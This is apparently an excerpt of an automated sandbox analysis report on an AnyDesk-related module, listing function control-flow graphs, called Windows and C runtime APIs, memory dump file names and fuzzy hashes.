                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                  • Opcode ID: 8bb5d0f272cce2152bf720603a3d27ba61399f805aef81330b5c3a43b7ded258
                                                                                                                                                                                                                                                  • Instruction ID: 3dd888233872cf07fe476d136ba07cdd2140ffe8f710de0c96e7ec8c598beaca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bb5d0f272cce2152bf720603a3d27ba61399f805aef81330b5c3a43b7ded258
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8A00275601155CB5B508E35470525935BD755669170540559405C5170D62555529603
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C42FC6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 413 69c42fc6-69c42fe4 414 69c42fe6-69c42fea 413->414 415 69c42fec 413->415 416 69c42fef-69c42ff5 414->416 415->416 417 69c432e2 call 69c4de5c 416->417 418 69c42ffb-69c42ffe 416->418 423 69c432e7-69c43302 call 69c42c44 call 69c42cf3 call 69c42bd6 417->423 418->417 419 69c43004-69c4300d 418->419 421 69c43013-69c43017 419->421 422 69c432ab 419->422 424 69c4301d-69c43024 421->424 425 69c430eb-69c430f1 421->425 427 69c432ae-69c432b2 422->427 452 69c43307 423->452 428 69c43026-69c4302d 424->428 429 69c4303c-69c43040 424->429 430 69c430f9-69c430ff 425->430 432 69c432b4-69c432b8 427->432 433 69c432d0-69c432d9 call 69c45598 427->433 428->429 435 69c4302f-69c43036 428->435 429->425 438 69c43046-69c4304f call 69c45598 429->438 430->427 436 69c43105-69c43109 430->436 432->417 439 69c432ba-69c432cd call 69c43327 432->439 433->417 445 69c432db-69c432e1 433->445 435->425 435->429 436->427 441 69c4310f-69c43116 436->441 438->445 453 69c43055-69c4306e call 69c45598 * 2 438->453 439->433 446 69c4312e-69c43132 441->446 447 69c43118-69c4311f 441->447 454 69c43235-69c43239 446->454 455 69c43138-69c43153 call 69c42347 446->455 447->446 451 69c43121-69c43128 447->451 451->427 451->446 458 69c4330a-69c43326 call 69c423f1 call 69c43752 call 69c42ec7 452->458 453->417 477 69c43074-69c4307a 453->477 456 69c43245-69c43249 454->456 457 69c4323b-69c43244 call 69c42c44 454->457 455->454 467 69c43159-69c4315f 455->467 456->433 463 69c4324f-69c4325b 456->463 457->456 463->433 469 69c4325d-69c43261 463->469 473 69c43162-69c4316e 467->473 474 69c43263-69c43267 469->474 475 69c4326f-69c43273 469->475 478 69c43174-69c43177 473->478 479 69c43222-69c4322f 473->479 474->433 480 69c43269-69c4326d 474->480 475->417 481 69c43275-69c43282 call 69c43442 475->481 483 69c430a7-69c430b0 call 69c45598 477->483 484 69c4307c-69c43080 477->484 478->479 485 69c4317d-69c4318d 478->485 479->454 479->473 480->433 480->475 481->433 492 69c43284-69c432a6 call 69c45598 * 4 481->492 501 69c430b2-69c430d3 call 69c45598 * 2 call 69c43442 483->501 502 69c430f3-69c430f6 483->502 484->483 488 69c43082-69c43089 484->488 485->479 489 69c43193-69c431a4 485->489 493 69c4309d-69c430a1 488->493 494 69c4308b-69c43092 488->494 495 69c431a7-69c431af 489->495 492->452 527 69c432a8-69c432a9 492->527 493->417 493->483 494->493 498 69c43094-69c4309b 494->498 499 69c431b1-69c431c3 call 69c43916 495->499 500 69c431dc-69c431e6 495->500 498->483 498->493 512 69c431c5-69c431d7 499->512 513 69c431f0-69c43216 call 69c42f01 499->513 506 69c431e8-69c431ee 500->506 507 69c43219-69c4321f 500->507 501->502 524 69c430d5-69c430e0 call 69c434de 501->524 502->430 506->495 507->479 512->499 516 69c431d9 512->516 513->507 516->500 524->417 529 69c430e6 524->529 527->458 529->423
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 69C430CA
                                                                                                                                                                                                                                                  • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 69C43145
                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 69C431B9
                                                                                                                                                                                                                                                  • ___DestructExceptionObject.LIBVCRUNTIME ref: 69C4323E
                                                                                                                                                                                                                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 69C43279
                                                                                                                                                                                                                                                  • ___DestructExceptionObject.LIBVCRUNTIME ref: 69C432EA
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 69C43302
                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 69C4330A
                                                                                                                                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 69C43316
                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 69C43321
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FrameFramesMatchNestedRangeStateThrowTrysTypeUnexpected
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 1230517499-393685449
                                                                                                                                                                                                                                                  • Opcode ID: 07c7369a691616e1be864ca776c6501315653ec1c452c2f7efc0d7268fa95dcf
                                                                                                                                                                                                                                                  • Instruction ID: efd08b4e137a9876d057dfae05602bc4aadff13f20396b04de4052247d2c34c3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07c7369a691616e1be864ca776c6501315653ec1c452c2f7efc0d7268fa95dcf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AB1D174A00309DFCF21CF94EA41B9EBBB5BF89B14F508159E81167652E336EA41CFA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4BA4E Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 530 69c4ba4e-69c4ba85 531 69c4bd9f-69c4bda7 530->531 532 69c4ba8b-69c4ba93 530->532 533 69c4bdac-69c4bdd4 531->533 534 69c4bda9 531->534 535 69c4ba95-69c4baab call 69c54a36 532->535 536 69c4bab1-69c4bab3 532->536 538 69c4bddb-69c4bdeb call 69c40c5d 533->538 534->533 535->536 543 69c4bd6c-69c4bd91 call 69c4cba5 * 4 535->543 537 69c4bab5 call 69c4b8f3 536->537 540 69c4baba-69c4baca call 69c4cba5 537->540 549 69c4bacb call 69c4b8f3 540->549 562 69c4bd92-69c4bd9d call 69c4cba5 543->562 551 69c4bad0-69c4badb call 69c4cba5 549->551 557 69c4badc call 69c4b8f3 551->557 559 69c4bae1-69c4baec call 69c4cba5 557->559 565 69c4baed call 69c4b8f3 559->565 562->538 567 69c4baf2-69c4bafd call 69c4cba5 565->567 570 69c4bb02 call 69c4b8f3 567->570 571 69c4bb07-69c4bb18 call 69c4cba5 570->571 571->543 574 69c4bb1e-69c4bb21 571->574 574->543 575 69c4bb27-69c4bb29 574->575 575->543 576 69c4bb2f-69c4bb32 575->576 576->543 577 69c4bb38-69c4bb3b 576->577 577->543 578 69c4bb41 577->578 579 69c4bb43-69c4bb4c 578->579 579->579 580 69c4bb4e-69c4bb5d GetCPInfo 579->580 580->543 581 69c4bb63-69c4bb69 580->581 581->543 582 69c4bb6f-69c4bba3 call 69c54f22 581->582 582->543 585 69c4bba9-69c4bbd7 call 69c54f22 582->585 585->543 588 69c4bbdd-69c4bbe1 585->588 589 69c4bbe3-69c4bbe6 588->589 590 69c4bc0e-69c4bc31 call 69c54be8 588->590 589->590 591 69c4bbe8 589->591 590->543 596 69c4bc37-69c4bc6b 590->596 593 69c4bbeb-69c4bbef 591->593 593->590 595 69c4bbf1-69c4bbf8 593->595 597 69c4bc02-69c4bc04 595->597 598 69c4bcad-69c4bcea 596->598 599 69c4bc6d-69c4bc70 596->599 603 69c4bc06-69c4bc0c 597->603 604 69c4bbfa-69c4bbff 597->604 601 69c4bd35-69c4bd6a 598->601 602 69c4bcec-69c4bcf3 598->602 599->598 600 69c4bc72 599->600 605 69c4bc75-69c4bc79 600->605 601->562 602->601 606 69c4bcf5-69c4bd32 call 69c4cba5 * 4 602->606 603->590 603->593 604->597 607 69c4bcaa 605->607 608 69c4bc7b-69c4bc84 605->608 606->601 607->598 610 69c4bc86-69c4bc8c 608->610 611 69c4bca2-69c4bca8 608->611 613 69c4bc8f-69c4bca0 610->613 611->605 611->607 613->611 613->613
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                                  • Opcode ID: 51962aba01204b3ec9a363561d4adcc0dca43e9e60c674a990de91e178db3287
                                                                                                                                                                                                                                                  • Instruction ID: 346d42ae90e79c8147b5cc9d6dd7561cc865583268e6cb2cba7181fd64c325d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51962aba01204b3ec9a363561d4adcc0dca43e9e60c674a990de91e178db3287
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5B1A075A403059FEF11CFA9D880BEEBBF4FF08704F148169E895A7291EB769945CB20
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C57EE9 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 620 69c57ee9-69c57efd 621 69c57eff-69c57f04 620->621 622 69c57f6b-69c57f73 620->622 621->622 623 69c57f06-69c57f0b 621->623 624 69c57f75-69c57f78 622->624 625 69c57fba-69c57fd2 call 69c5805c 622->625 623->622 626 69c57f0d-69c57f10 623->626 624->625 628 69c57f7a-69c57fb7 call 69c4cba5 * 4 624->628 634 69c57fd5-69c57fdc 625->634 626->622 629 69c57f12-69c57f1a 626->629 628->625 632 69c57f34-69c57f3c 629->632 633 69c57f1c-69c57f1f 629->633 639 69c57f56-69c57f6a call 69c4cba5 * 2 632->639 640 69c57f3e-69c57f41 632->640 633->632 636 69c57f21-69c57f33 call 69c4cba5 call 69c598b3 633->636 637 69c57fde-69c57fe2 634->637 638 69c57ffb-69c57fff 634->638 636->632 648 69c57fe4-69c57fe7 637->648 649 69c57ff8 637->649 644 69c58017-69c58023 638->644 645 69c58001-69c58006 638->645 639->622 640->639 642 69c57f43-69c57f55 call 69c4cba5 call 69c59d6d 640->642 642->639 644->634 655 69c58025-69c58032 call 69c4cba5 644->655 652 69c58014 645->652 653 69c58008-69c5800b 645->653 648->649 657 69c57fe9-69c57ff7 call 69c4cba5 * 2 648->657 649->638 652->644 653->652 660 69c5800d-69c58013 call 69c4cba5 653->660 657->649 660->652
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 69C57F2D
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C598D0
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C598E2
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C598F4
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59906
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59918
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C5992A
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C5993C
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C5994E
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59960
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59972
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59984
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C59996
                                                                                                                                                                                                                                                    • Part of subcall function 69C598B3: _free.LIBCMT ref: 69C599A8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F22
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F44
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F59
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F64
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F86
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57F99
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FA7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FB2
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FEA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C57FF1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5800E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C58026
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                  • Opcode ID: a4826c6d6b67bd7721ba1a9d83b75279a22d4d514fc33aa0821889554e451b1e
                                                                                                                                                                                                                                                  • Instruction ID: 2106a267954ef79babeb10b5e12ba84cbf7bb9cc795f8693df8bcbcf5044c1e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4826c6d6b67bd7721ba1a9d83b75279a22d4d514fc33aa0821889554e451b1e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06314E31604B019FEB21DA38F844F9673E9BF40714F10D519E49AD71A0FF31A9A89764
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C225F0 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 300threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 677 69c225f0-69c22623 678 69c22625-69c22627 677->678 679 69c22629-69c2262c 677->679 680 69c22640-69c22668 call 69c2d710 678->680 681 69c22632-69c22634 679->681 682 69c2262e-69c22630 679->682 687 69c2266a-69c2266d 680->687 688 69c2266f-69c22684 call 69c26c50 680->688 683 69c22637-69c2263c 681->683 682->680 683->683 685 69c2263e 683->685 685->680 687->688 691 69c22686-69c2269c GetCurrentProcessId call 69c238e0 call 69c26c50 688->691 692 69c2269f-69c226a6 688->692 691->692 694 69c226c1-69c22760 call 69c49c00 call 69c46440 call 69c3fd69 * 2 call 69c238e0 692->694 695 69c226a8-69c226be GetCurrentThreadId call 69c237d0 call 69c26c50 692->695 714 69c22762-69c22764 694->714 715 69c22766-69c2276b 694->715 695->694 716 69c2276d-69c227b7 call 69c3fd69 call 69c238e0 call 69c26c50 714->716 715->716 724 69c227b9-69c227bb 716->724 725 69c227bd-69c227c2 716->725 726 69c227c4-69c22803 call 69c3fd69 call 69c238e0 724->726 725->726 732 69c22805-69c22807 726->732 733 69c22809-69c2280e 726->733 734 69c22810-69c2284f call 69c3fd69 call 69c238e0 732->734 733->734 740 69c22851-69c22853 734->740 741 69c22855-69c2285a 734->741 742 69c2285c-69c22890 call 69c238e0 call 69c26c50 740->742 741->742 748 69c22892-69c228aa GetTickCount call 69c236c0 call 69c26c50 742->748 749 69c228ad-69c228b5 742->749 748->749 751 69c228e0-69c228f3 call 69c26ec0 call 69c238e0 749->751 752 69c228b7-69c228ba 749->752 765 69c228f8-69c22962 call 69c26ec0 call 69c2d980 call 69c26ec0 call 69c238e0 call 69c26ec0 call 69c25110 751->765 755 69c228cf-69c228de call 69c26ec0 752->755 756 69c228bc-69c228cd call 69c26ec0 752->756 755->765 756->765 778 69c22973-69c22987 call 69c40c5d 765->778 779 69c22964-69c2296e call 69c25280 765->779 779->778
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Smanip$Current$CountProcessThreadTick
                                                                                                                                                                                                                                                  • String ID: )] $UNKNOWN$VERBOSE
                                                                                                                                                                                                                                                  • API String ID: 1623629380-3915483136
                                                                                                                                                                                                                                                  • Opcode ID: ba98b9a16dde5bd4cf87a9896cd7e94da36cbde1c41811f4d56f25bcd4f77724
                                                                                                                                                                                                                                                  • Instruction ID: db9d401375cc1bddb14007bffec7197e5add0a49bb5de6b951973be580f5d748
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba98b9a16dde5bd4cf87a9896cd7e94da36cbde1c41811f4d56f25bcd4f77724
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DA1FEB5A04300AFD724DF64EC55F1ABBE5BF85708F048829F9898B291FB31D505CBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C31CB0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 265threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C31CCF
                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 69C31CFD
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C31D4A
                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 69C31D72
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 69C31E06
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 69C31E19
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?), ref: 69C31EDE
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?), ref: 69C31F31
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?), ref: 69C31FBF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCloseHandleReleaseValue$CurrentThread
                                                                                                                                                                                                                                                  • String ID: Failed to TlsSetValue().$c:\b\build\slave\win\build\src\base\threading\thread_local_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3870014289-1575462531
                                                                                                                                                                                                                                                  • Opcode ID: 7b910b6ad2f7e5807ec24e1a3fc45678bc580abe2019a7a0dc67c1bf612c0051
                                                                                                                                                                                                                                                  • Instruction ID: f054ac1df49494483968b8dbe51271d2a96736843d45851dbb19dc364d1bc5f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b910b6ad2f7e5807ec24e1a3fc45678bc580abe2019a7a0dc67c1bf612c0051
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03815475908354AFDB00DF64EC85BCA77E8BF55314F408829FD998B181FB70A649CBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C599B1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 77137fb85bc1237dffa6ba337794c5b711a5dd78753399fa1ea8cee5ccd44897
                                                                                                                                                                                                                                                  • Instruction ID: 4eb12924d2701b10ff46feb4ec15dd662379442ad3b152805d9a33fd9d280399
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77137fb85bc1237dffa6ba337794c5b711a5dd78753399fa1ea8cee5ccd44897
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAC177B6E40204AFEB20DBA8DC82FDE77F9EB45744F444165FA05FB281F6709A608764
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6526F Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 305fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C66AB6: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 69C66AEE
                                                                                                                                                                                                                                                    • Part of subcall function 69C66AB6: GetLastError.KERNEL32 ref: 69C66B07
